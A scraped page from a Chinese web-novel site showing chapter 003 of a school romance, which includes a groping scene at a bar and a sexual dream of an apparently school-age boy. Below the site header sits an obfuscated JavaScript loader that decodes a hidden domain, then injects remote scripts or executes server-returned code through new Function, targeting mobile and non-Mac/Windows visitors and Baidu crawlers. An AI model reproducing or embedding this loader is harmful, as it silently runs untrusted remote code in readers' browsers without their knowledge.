98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

003启蒙(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

('003启蒙

众人继续谈天说地,不知何时进来一位娇俏的女同学打招呼:“刚刚还以为看错了,原来真是学长们啊。”

大家也顺水推舟地邀请一起,结果发现还真有他们经常讨论的女同学在,比如赵可欣、叶欣。

杯盏交错间,女生都有意无意地瞥向角落仰头闭目的声音身影,吸引人的男生有很多种,八面玲珑的周行止是一种,爽朗体贴的徐成蹊是一种,还有一种……不需要太多的语言, 静静地坐在那里就有一种似有若无的气质不断地彰显着他的存在。

有几个女生试探着坐在旁边的位置小声搭话,结果闭目养神的人好像完全睡着一般无动于衷。

直到一位大胆的直接摸上大腿,沿着缓慢摩挲,当手腕被大力握住的时候赵可欣眨着无辜眼弱弱地说道:“……奚扬,我第一次来酒吧有点怕……”话还没说完就被奚扬一把甩开。

听到动静的徐成蹊走过来,就见奚扬拿起外套跟他挥手:“先走了。”

周行止微笑着过来当和事佬:“别介啊,他今天心情不好。”

徐成蹊追到奚扬跟前碎碎念:”真是暴殄天物啊,每次和你上厕所总是有点自卑……”

“徐成蹊。”奚扬忽然停下,勾起嘴角,丹凤眼睥睨着他,“你行你上啊。”

一旦谈及尊严问题,饶是百无禁忌大大咧咧的徐成蹊也跳脚:“无就算是经验不算丰富也觉得比你……”

“要不要给介绍会所啊?”不知何时跟过来的周行止盯着他的下腹处挪揄。

回答他们的是挥手的背影,举手投足间竟然生出一丝潇洒的气息。

当晚奚扬的梦里开满了栀子花,窗边的女孩一脸清冷地看书,忽然转头朝他露出一丝纯真而友好的笑。天色变暗,带着狐狸面具的女人身穿黑色小礼服朝他走近,带着妩媚的笑轻抚他的胸膛,温热的手指伸进去打开衬衫纽扣,一路向下一直到……裤子里面,早已僵硬的某处感受到柔软的包裹更加鼓胀不止。

在奚扬的薄唇将要碰上那闪着缎光的红唇时一束白光结束了满含栀子香的梦。

刚刚升起的抬眼透过窗帘的缝隙处照在床上,原本沉睡的少年一脸迷茫地睁开眼,下腹的潮湿提醒着他昨晚的淫靡。

床头柜上的闹钟显示着早已迟到的时间,少年愠恼地起身去浴室清理,出来时拿起床头随手放着的栀子花若有所思。

下楼时刚好奚母也在家,华服加身、妆容精致,看到奚扬也没有惊讶,只是露出得体的微笑上前:“奚扬在家?怎么没去上学?”

“等会儿去。”言简意赅。

“对了,你哥哥就快从美国回来了,有什么要带跟他说一声。”奚母上前拍拍他的肩膀,毫不在意他可以称得上冷淡的态度,只是拎着最新款的Gi包包准备出门,“注意身体,我先走了。”

奚扬打开冰箱,闻言只是轻扯嘴角露出讽刺的笑。

晚栀正在考虑要不要辞掉酒吧的兼职,alcohol library的名气越来越大,学校里熟悉的人去的人也开始变多,被人认出来一定会带来很多麻烦。

微信里跟Zorro说时对方表示万分的不舍但是依然对她的决定表示尊重,只是因为酒吧的工作人员有一定门槛,招新补缺还需要一定时间,所以她还得先继续工作一个月。

“小栀子,我们走啦。”薛茹牵起她的手,见她正在拿着手机发微信便没有继续打扰。

晚栀回复完便摇摇她们牵着的手:“谢谢你昨天帮我打掩护啊。”晚栀是单亲家庭,和父亲一起住,身为大学教授的虞父虽然对她的教育挺开明,但是晚归是绝对不允许的,所以每当这个时候总是拜托薛茹这个小表姐。

“小case!”薛茹俏皮地朝她眨眼,然后谄媚地凑近,“什么时候也带我去玩儿玩儿啊?”

“你试试?”牧野低沉的声音响起,也不知是对谁说的,但是不管对谁反正刚刚还一脸轻松的两姐妹都一起抖了抖。

晚栀壮似可靠地朝他点头:“你放心!”就差拍胸脯了。

牧野提起手上的饭盒递给晚栀:“薛姨做的寿司。”

“三文鱼的我可以吃一点点吗?”海鲜过敏的薛茹同学再次可怜巴巴地凑过来。

晚栀心道寿司吃一点点还是可以的,面上依旧忌惮地看着一旁最近一直阴晴不定的小祖宗。

牧野走过去揽着薛茹的肩膀:“最近在F班太自由都放飞了?嗯?”

薛茹不满地看着他,沉默不言地甩开他的手,跑到晚栀的另一边挽着她的手。

……呃……?夹在这对超级别扭的继兄妹中间的晚栀无语凝噎:她能不能隐身啊!

结果不久之后发现,要是她能立马消失就好了。

奚扬上午没来。大家都探头探脑地看着她这边,但都没做多想,毕竟对于奚扬这等人物来说,其实都没所谓。

作为常年作业空白,考试更是看心情交白卷的依然可以看心情拿全国奥利匹克竞赛的奖项、进理科A班,当上学生会副会长的大人物,大家都是相当敬佩的,敬佩至于更多的是好奇。另一位副会长牧野被选上能理解,毕竟学校董事会就是牧家天下,至于奚扬?只听说入学时人家爷爷直接给捐助了几栋楼。

晚栀能知道这些多亏了坐在她前面的前同桌,小灵通柏灵。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间